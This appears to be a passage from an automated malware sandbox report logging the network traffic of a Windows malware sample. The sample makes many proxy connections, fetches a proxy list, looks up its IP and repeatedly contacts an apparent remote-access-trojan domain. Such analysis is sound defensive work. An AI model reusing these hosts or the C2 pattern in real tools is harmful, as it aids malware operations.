                  Source: global trafficTCP traffic: 192.168.2.4:50107 -> 196.44.181.37:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50108 -> 38.51.49.84:999
                  Source: global trafficTCP traffic: 192.168.2.4:50109 -> 177.93.45.154:999
                  Source: global trafficTCP traffic: 192.168.2.4:50110 -> 185.32.4.110:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50113 -> 176.8.230.197:8187
                  Source: global trafficTCP traffic: 192.168.2.4:50116 -> 185.123.101.174:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50117 -> 31.214.171.62:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50118 -> 89.111.133.217:9151
                  Source: global trafficTCP traffic: 192.168.2.4:50119 -> 129.18.164.130:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50120 -> 196.251.221.2:8104
                  Source: global trafficTCP traffic: 192.168.2.4:50121 -> 103.156.249.82:1111
                  Source: global trafficTCP traffic: 192.168.2.4:50122 -> 112.5.128.78:8060
                  Source: global trafficTCP traffic: 192.168.2.4:50123 -> 8.218.100.120:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50124 -> 41.33.203.234:1975
                  Source: global trafficTCP traffic: 192.168.2.4:50125 -> 181.78.85.45:998
                  Source: global trafficTCP traffic: 192.168.2.4:50126 -> 156.239.50.58:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50127 -> 103.47.93.231:1080
                  Source: global trafficTCP traffic: 192.168.2.4:50128 -> 180.191.254.10:8081
                  Source: global trafficTCP traffic: 192.168.2.4:50129 -> 104.238.111.107:26305
                  Source: global trafficTCP traffic: 192.168.2.4:50130 -> 103.167.68.77:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50132 -> 190.97.238.89:999
                  Source: global trafficTCP traffic: 192.168.2.4:50133 -> 213.136.79.177:38772
                  Source: global trafficTCP traffic: 192.168.2.4:50134 -> 103.130.113.129:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50136 -> 38.162.25.61:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50137 -> 23.105.170.32:37770
                  Source: global trafficTCP traffic: 192.168.2.4:50138 -> 184.181.217.194:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50140 -> 1.15.62.12:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50141 -> 91.226.240.58:6666
                  Source: global trafficTCP traffic: 192.168.2.4:50143 -> 38.162.28.79:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50144 -> 202.40.188.201:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50145 -> 103.151.236.131:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50146 -> 171.35.172.147:9999
                  Source: global trafficTCP traffic: 192.168.2.4:50148 -> 72.10.164.178:9949
                  Source: global trafficTCP traffic: 192.168.2.4:50149 -> 187.141.184.235:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50150 -> 103.79.96.189:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50151 -> 167.86.69.142:36394
                  Source: global trafficTCP traffic: 192.168.2.4:50153 -> 162.254.38.202:24000
                  Source: global trafficTCP traffic: 192.168.2.4:50156 -> 103.174.178.249:2004
                  Source: global trafficTCP traffic: 192.168.2.4:50157 -> 35.79.120.242:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50158 -> 142.54.226.214:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50159 -> 103.124.139.137:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50163 -> 24.249.199.12:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50142 -> 176.31.110.126:45517
                  Source: global trafficTCP traffic: 192.168.2.4:50164 -> 14.241.182.44:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50165 -> 212.42.56.120:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50168 -> 187.40.1.123:128
                  Source: global trafficTCP traffic: 192.168.2.4:50169 -> 196.20.125.129:8083
                  Source: global trafficTCP traffic: 192.168.2.4:50170 -> 92.205.110.118:18374
                  Source: global trafficTCP traffic: 192.168.2.4:50171 -> 65.1.40.47:1080
                  Source: global trafficTCP traffic: 192.168.2.4:50172 -> 45.11.95.165:6048
                  Source: global trafficTCP traffic: 192.168.2.4:50173 -> 110.34.3.229:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50174 -> 41.139.197.185:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50175 -> 107.180.88.173:59820
                  Source: global trafficTCP traffic: 192.168.2.4:50176 -> 156.239.49.172:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50177 -> 202.139.198.15:3050
                  Source: global trafficTCP traffic: 192.168.2.4:50178 -> 20.24.43.214:8123
                  Source: global trafficTCP traffic: 192.168.2.4:50179 -> 5.189.158.162:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50180 -> 203.150.128.243:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50181 -> 103.146.197.47:8292
                  Source: global trafficTCP traffic: 192.168.2.4:50182 -> 38.56.70.97:999
                  Source: global trafficTCP traffic: 192.168.2.4:50183 -> 186.224.225.26:42648
                  Source: global trafficTCP traffic: 192.168.2.4:50184 -> 85.25.177.53:57699
                  Source: global trafficTCP traffic: 192.168.2.4:50185 -> 128.199.221.91:30447
                  Source: global trafficTCP traffic: 192.168.2.4:50186 -> 103.152.232.123:8199
                  Source: global trafficTCP traffic: 192.168.2.4:50187 -> 67.43.228.253:11923
                  Source: global trafficTCP traffic: 192.168.2.4:50189 -> 212.126.5.248:42344
                  Source: global trafficTCP traffic: 192.168.2.4:50190 -> 185.220.174.99:17886
                  Source: global trafficTCP traffic: 192.168.2.4:50191 -> 103.178.42.3:8181
                  Source: global trafficTCP traffic: 192.168.2.4:50192 -> 203.217.169.207:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50193 -> 213.32.252.134:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50194 -> 103.76.151.133:8181
                  Source: global trafficTCP traffic: 192.168.2.4:50197 -> 45.70.206.29:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50196 -> 38.162.27.149:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50198 -> 45.239.30.1:999
                  Source: global trafficTCP traffic: 192.168.2.4:50200 -> 200.116.230.212:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50201 -> 75.119.145.154:7505
                  Source: global trafficTCP traffic: 192.168.2.4:50203 -> 162.241.46.40:61579
                  Source: global trafficTCP traffic: 192.168.2.4:50205 -> 185.236.203.208:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50206 -> 124.158.186.254:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50208 -> 176.113.73.102:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50209 -> 37.220.139.219:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50212 -> 179.125.51.54:27234
                  Source: global trafficTCP traffic: 192.168.2.4:50213 -> 91.247.92.63:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50210 -> 193.30.13.13:999
                  Source: global trafficTCP traffic: 192.168.2.4:50215 -> 202.40.186.26:1080
                  Source: global trafficTCP traffic: 192.168.2.4:50217 -> 109.175.9.203:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50218 -> 220.189.52.36:2080
                  Source: global trafficTCP traffic: 192.168.2.4:50219 -> 174.138.176.75:35891
                  Source: global trafficTCP traffic: 192.168.2.4:50220 -> 176.241.89.244:50547
                  Source: global trafficTCP traffic: 192.168.2.4:50221 -> 154.79.254.236:32650
                  Source: global trafficTCP traffic: 192.168.2.4:50222 -> 147.75.34.86:10008
                  Source: global trafficTCP traffic: 192.168.2.4:50223 -> 81.12.169.254:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50224 -> 103.55.33.59:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50225 -> 188.191.164.55:4890
                  Source: global trafficTCP traffic: 192.168.2.4:50226 -> 104.165.127.36:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50229 -> 46.21.153.16:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50230 -> 103.217.217.190:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50231 -> 121.204.179.70:7777
                  Source: global trafficTCP traffic: 192.168.2.4:50232 -> 37.32.98.160:37758
                  Source: global trafficTCP traffic: 192.168.2.4:50234 -> 103.133.27.143:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50235 -> 146.19.106.217:12334
                  Source: global trafficTCP traffic: 192.168.2.4:50236 -> 20.219.182.59:3129
                  Source: global trafficTCP traffic: 192.168.2.4:50238 -> 23.152.40.14:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50239 -> 68.1.210.163:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50240 -> 154.16.116.166:39759
                  Source: global trafficTCP traffic: 192.168.2.4:50241 -> 200.7.8.74:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50242 -> 46.250.25.225:53281
                  Source: global trafficTCP traffic: 192.168.2.4:50243 -> 162.240.239.103:42771
                  Source: global trafficTCP traffic: 192.168.2.4:50244 -> 190.6.56.133:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50245 -> 51.158.68.133:8811
                  Source: global trafficTCP traffic: 192.168.2.4:50246 -> 212.110.188.195:34411
                  Source: global trafficTCP traffic: 192.168.2.4:50247 -> 101.109.80.117:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50248 -> 162.214.121.11:8989
                  Source: global trafficTCP traffic: 192.168.2.4:50249 -> 78.128.81.220:31623
                  Source: global trafficTCP traffic: 192.168.2.4:50250 -> 198.199.120.65:8000
                  Source: global trafficTCP traffic: 192.168.2.4:50251 -> 156.239.53.141:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50252 -> 185.103.101.39:10051
                  Source: global trafficTCP traffic: 192.168.2.4:50253 -> 201.71.3.52:999
                  Source: global trafficTCP traffic: 192.168.2.4:50254 -> 177.234.194.154:999
                  Source: global trafficTCP traffic: 192.168.2.4:50255 -> 160.153.245.187:31745
                  Source: global trafficTCP traffic: 192.168.2.4:50256 -> 41.254.53.70:1981
                  Source: global trafficTCP traffic: 192.168.2.4:50258 -> 67.43.227.228:9039
                  Source: global trafficTCP traffic: 192.168.2.4:50260 -> 182.52.108.58:3629
                  Source: global trafficTCP traffic: 192.168.2.4:50261 -> 43.155.142.116:15673
                  Source: global trafficTCP traffic: 192.168.2.4:50263 -> 194.4.50.91:12334
                  Source: global trafficTCP traffic: 192.168.2.4:50264 -> 91.185.236.239:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50265 -> 200.55.249.135:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50267 -> 120.234.203.171:9002
                  Source: global trafficTCP traffic: 192.168.2.4:50268 -> 79.110.119.177:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50271 -> 197.248.86.237:32650
                  Source: global trafficTCP traffic: 192.168.2.4:50272 -> 134.209.29.120:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50273 -> 103.4.118.130:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50276 -> 177.234.194.156:999
                  Source: global trafficTCP traffic: 192.168.2.4:50277 -> 103.105.55.51:8081
                  Source: global trafficTCP traffic: 192.168.2.4:50278 -> 139.59.6.54:54571
                  Source: global trafficTCP traffic: 192.168.2.4:50279 -> 103.59.190.209:56252
                  Source: global trafficTCP traffic: 192.168.2.4:50280 -> 204.157.251.169:999
                  Source: global trafficTCP traffic: 192.168.2.4:50281 -> 38.162.29.145:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50282 -> 114.231.42.41:8089
                  Source: global trafficTCP traffic: 192.168.2.4:50283 -> 111.225.152.191:8089
                  Source: global trafficTCP traffic: 192.168.2.4:50284 -> 147.75.92.244:9401
                  Source: global trafficTCP traffic: 192.168.2.4:50285 -> 103.154.230.112:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50287 -> 83.220.168.57:10102
                  Source: global trafficTCP traffic: 192.168.2.4:50289 -> 38.162.25.19:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50290 -> 164.163.21.14:8291
                  Source: global trafficTCP traffic: 192.168.2.4:50291 -> 188.132.222.5:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50292 -> 218.23.15.154:9002
                  Source: global trafficTCP traffic: 192.168.2.4:50293 -> 104.248.158.78:62952
                  Source: global trafficTCP traffic: 192.168.2.4:50294 -> 125.24.56.159:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50295 -> 182.253.181.10:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50297 -> 67.73.245.205:999
                  Source: global trafficTCP traffic: 192.168.2.4:50299 -> 113.223.214.1:8089
                  Source: global trafficTCP traffic: 192.168.2.4:50301 -> 177.125.205.38:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50303 -> 181.212.45.226:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50304 -> 163.172.129.251:16379
                  Source: global trafficTCP traffic: 192.168.2.4:50305 -> 185.244.30.43:24301
                  Source: global trafficTCP traffic: 192.168.2.4:50310 -> 177.72.82.47:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50311 -> 98.188.47.132:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50314 -> 185.118.153.110:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50316 -> 194.247.173.17:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50318 -> 123.57.236.139:8899
                  Source: global trafficTCP traffic: 192.168.2.4:50319 -> 222.252.18.8:19132
                  Source: global trafficTCP traffic: 192.168.2.4:50320 -> 156.239.50.63:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50322 -> 8.222.152.158:55555
                  Source: global trafficTCP traffic: 192.168.2.4:50326 -> 8.210.158.189:9061
                  Source: global trafficTCP traffic: 192.168.2.4:50329 -> 62.39.117.234:8111
                  Source: global trafficTCP traffic: 192.168.2.4:50330 -> 5.59.141.94:1080
                  Source: global trafficTCP traffic: 192.168.2.4:50332 -> 103.242.104.101:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50333 -> 154.126.81.163:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50335 -> 139.162.238.184:13302
                  Source: global trafficTCP traffic: 192.168.2.4:50337 -> 117.70.49.27:8089
                  Source: global trafficTCP traffic: 192.168.2.4:50338 -> 184.178.172.23:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50340 -> 170.80.242.98:999
                  Source: global trafficTCP traffic: 192.168.2.4:50341 -> 111.95.40.244:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50344 -> 156.232.9.194:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50346 -> 94.131.14.66:1081
                  Source: global trafficTCP traffic: 192.168.2.4:50351 -> 156.239.49.19:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50353 -> 38.41.53.145:9090
                  Source: global trafficTCP traffic: 192.168.2.4:50354 -> 102.38.22.121:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50355 -> 191.7.208.32:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50358 -> 47.242.40.222:8888
                  Source: global trafficTCP traffic: 192.168.2.4:50360 -> 202.124.43.254:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50362 -> 88.99.148.60:8111
                  Source: global trafficTCP traffic: 192.168.2.4:50361 -> 162.241.45.22:63501
                  Source: global trafficTCP traffic: 192.168.2.4:50363 -> 37.120.173.124:9353
                  Source: global trafficTCP traffic: 192.168.2.4:50365 -> 187.60.219.4:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50366 -> 115.76.199.248:5311
                  Source: global trafficTCP traffic: 192.168.2.4:50364 -> 81.44.83.70:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50367 -> 113.176.118.255:7654
                  Source: global trafficTCP traffic: 192.168.2.4:50368 -> 180.183.69.89:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50370 -> 125.253.125.132:46051
                  Source: global trafficTCP traffic: 192.168.2.4:50372 -> 181.78.74.78:999
                  Source: global trafficTCP traffic: 192.168.2.4:50374 -> 205.233.79.230:999
                  Source: global trafficTCP traffic: 192.168.2.4:50375 -> 200.43.231.4:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50376 -> 212.83.142.145:60956
                  Source: global trafficTCP traffic: 192.168.2.4:50377 -> 167.172.109.12:41491
                  Source: global trafficTCP traffic: 192.168.2.4:50378 -> 45.189.151.27:999
                  Source: global trafficTCP traffic: 192.168.2.4:50379 -> 185.90.101.36:7046
                  Source: global trafficTCP traffic: 192.168.2.4:50380 -> 145.239.81.129:8008
                  Source: global trafficTCP traffic: 192.168.2.4:50382 -> 117.160.250.132:8899
                  Source: global trafficTCP traffic: 192.168.2.4:50381 -> 67.43.228.251:11339
                  Source: global trafficTCP traffic: 192.168.2.4:50385 -> 118.172.239.231:8180
                  Source: global trafficTCP traffic: 192.168.2.4:50386 -> 153.139.233.218:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50387 -> 147.75.34.83:10006
                  Source: global trafficTCP traffic: 192.168.2.4:50388 -> 183.230.162.122:9091
                  Source: global trafficTCP traffic: 192.168.2.4:50391 -> 202.142.159.204:41026
                  Source: global trafficTCP traffic: 192.168.2.4:50392 -> 152.67.10.190:8100
                  Source: global trafficTCP traffic: 192.168.2.4:50393 -> 88.202.230.103:46475
                  Source: global trafficTCP traffic: 192.168.2.4:50394 -> 164.92.237.188:63722
                  Source: global trafficTCP traffic: 192.168.2.4:50395 -> 65.169.38.73:26592
                  Source: global trafficTCP traffic: 192.168.2.4:50396 -> 202.58.199.229:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50397 -> 27.147.131.122:8090
                  Source: global trafficTCP traffic: 192.168.2.4:50399 -> 88.255.217.44:10820
                  Source: global trafficTCP traffic: 192.168.2.4:50400 -> 170.80.91.13:4145
                  Source: global trafficTCP traffic: 192.168.2.4:50401 -> 201.159.15.133:5678
                  Source: global trafficTCP traffic: 192.168.2.4:50402 -> 46.209.207.151:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50406 -> 47.100.236.23:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50407 -> 223.18.60.191:8080
                  Source: global trafficTCP traffic: 192.168.2.4:50410 -> 91.225.170.25:4153
                  Source: global trafficTCP traffic: 192.168.2.4:50412 -> 170.239.205.3:999
                  Source: global trafficTCP traffic: 192.168.2.4:50414 -> 24.144.95.218:8000
                  Source: global trafficTCP traffic: 192.168.2.4:50416 -> 51.161.99.114:29758
                  Source: global trafficTCP traffic: 192.168.2.4:50418 -> 174.139.46.100:58841
                  Source: global trafficTCP traffic: 192.168.2.4:50420 -> 212.5.143.42:3366
                  Source: global trafficTCP traffic: 192.168.2.4:50422 -> 3.37.125.76:3128
                  Source: global trafficTCP traffic: 192.168.2.4:50426 -> 161.97.173.42:50386
                  Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                  Source: Joe Sandbox ViewIP Address: 212.110.188.202 212.110.188.202
                  Source: Joe Sandbox ViewIP Address: 24.230.33.96 24.230.33.96
                  Source: Joe Sandbox ViewIP Address: 43.128.107.251 43.128.107.251
                  Source: Joe Sandbox ViewASN Name: BYTEMARK-ASGB BYTEMARK-ASGB
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeDNS query: name: ip-api.com
                  Source: global trafficTCP traffic: 192.168.2.4:55291 -> 108.170.55.203:587
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
